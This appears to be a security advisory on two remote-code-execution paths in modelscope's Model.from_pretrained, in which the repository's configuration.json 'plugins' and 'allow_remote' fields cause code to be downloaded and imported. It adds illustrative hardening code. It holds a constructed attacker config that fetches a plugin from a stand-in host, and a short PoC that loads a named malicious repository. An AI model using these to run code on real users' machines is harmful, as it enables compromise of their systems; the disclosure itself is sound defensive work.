When users call Model.from_pretrained, the following two call chains may lead to Remote Code Execution (RCE):
Model.from_pretrained -> modelscope.utils.plugins.register_plugins_repo -> import_plugins -> import_module_and_submodules -> importlib.import_module
Model.from_pretrained -> (ex)modelscope.utils.plugins.register_modelhub_repo -> import_module_from_model_dir -> importlib.import_module
In the first call chain, while loading the model files the loader reads the "plugins" field from the remote repository's configuration file configuration.json. If an entry is a URL, the package is downloaded from that URL and imported with importlib.import_module. Importing a package executes its top-level code, so a package containing malicious code runs it on the user's machine.
In the second call chain, the loader reads the "allow_remote" field from the same configuration.json and, if it is set, imports modules from the model directory with importlib.import_module. The decision to run repository-supplied code is therefore made by the repository author, not by the user, so a repository that sets allow_remote can execute arbitrary code during Model.from_pretrained.
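The common root cause of both chains is that a field written by whoever controls the repository is treated as authorization to download and import code. The following is an added, illustrative example (not modelscope's own code) of the flawed decision logic next to a hardened form in which only the caller's explicit trust_remote_code parameter can grant that authorization, and remote plugin URLs must additionally come from an allow-listed host. The configuration.json contents and the plugin URL are constructed for the example; the field names follow the advisory.

```python
"""
Illustrative gating of repository-driven code loading (assumed/hypothetical code,
not modelscope's implementation). Field names "plugins" and "allow_remote" follow
the advisory; everything else is an assumption for illustration.
"""
import importlib.util
import json
from urllib.parse import urlparse

# Constructed configuration.json from a hypothetical malicious repository.
# The plugin URL is invented for the example and does not exist.
ATTACKER_CONFIG_JSON = json.dumps({
    "framework": "pytorch",
    "task": "translation",
    "plugins": ["https://plugins.example.invalid/evil_plugin.tar.gz"],
    "allow_remote": True,
})


class RemoteCodeRefused(Exception):
    """The repository asked to load code the caller never opted in to."""


def load_config(text):
    """Parse configuration.json and return it as a plain dict."""
    cfg = json.loads(text)
    if not isinstance(cfg, dict):
        raise ValueError("configuration.json must be a JSON object")
    return cfg


def _plugin_entries(cfg):
    """Normalise the "plugins" field to a list (it may be a string or a list)."""
    plugins = cfg.get("plugins") or []
    return [plugins] if isinstance(plugins, str) else list(plugins)


def plan_vulnerable(cfg):
    """
    The flawed pattern described in the advisory: fields controlled by the
    repository author decide what gets downloaded and imported. Returns the
    actions the loader would take (this example only plans, it never imports).
    """
    plan = [("download_and_import", p) for p in _plugin_entries(cfg)]
    if cfg.get("allow_remote"):
        plan.append(("import_model_dir_modules", None))
    return plan


def plan_hardened(cfg, trust_remote_code=False, allowed_plugin_hosts=frozenset()):
    """
    Hardened pattern: only the caller's trust_remote_code=True can authorise
    importing repository-supplied code, and remote plugin URLs must also point at
    an allow-listed host. "allow_remote" in the config is a request, not a grant.
    """
    plan = []
    for p in _plugin_entries(cfg):
        parsed = urlparse(p)
        if parsed.scheme in ("http", "https"):
            if not trust_remote_code:
                raise RemoteCodeRefused(
                    f"config asks to fetch plugin {p}; caller did not set trust_remote_code=True")
            if parsed.hostname not in allowed_plugin_hosts:
                raise RemoteCodeRefused(f"plugin host {parsed.hostname!r} is not allow-listed")
            plan.append(("download_and_import", p))
        else:
            # A bare module name is never downloaded: it is imported only if it is
            # already installed in the caller's environment.
            try:
                spec = importlib.util.find_spec(p)
            except (ImportError, ValueError):
                spec = None
            if spec is None:
                raise RemoteCodeRefused(f"plugin {p!r} is not installed and will not be fetched")
            plan.append(("import_installed", p))
    if cfg.get("allow_remote"):
        if not trust_remote_code:
            raise RemoteCodeRefused(
                "config sets allow_remote=true but caller did not set trust_remote_code=True")
        plan.append(("import_model_dir_modules", None))
    return plan


if __name__ == "__main__":
    cfg = load_config(ATTACKER_CONFIG_JSON)
    print("vulnerable loader would:", plan_vulnerable(cfg))
    try:
        plan_hardened(cfg)
    except RemoteCodeRefused as exc:
        print("hardened loader refused:", exc)
```

The hardened planner refuses the constructed configuration by default, still refuses it when the caller opts in but the plugin host is not allow-listed, and only proceeds when both conditions hold; a bare plugin name is resolved with importlib.util.find_spec and never fetched from the network.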
PoC
After setting up the environment, running the following code prints "hello" and "register_modelhub_repo has error xxx", indicating that the malicious code has executed:
from modelscope.models import Model

# Repository whose configuration.json carries the malicious "plugins" / "allow_remote" fields
model_id = 'jiruwozhi/plugin_rce'

# Loading the model triggers the plugin download and the module import described above
model = Model.from_pretrained(model_id, task='translation')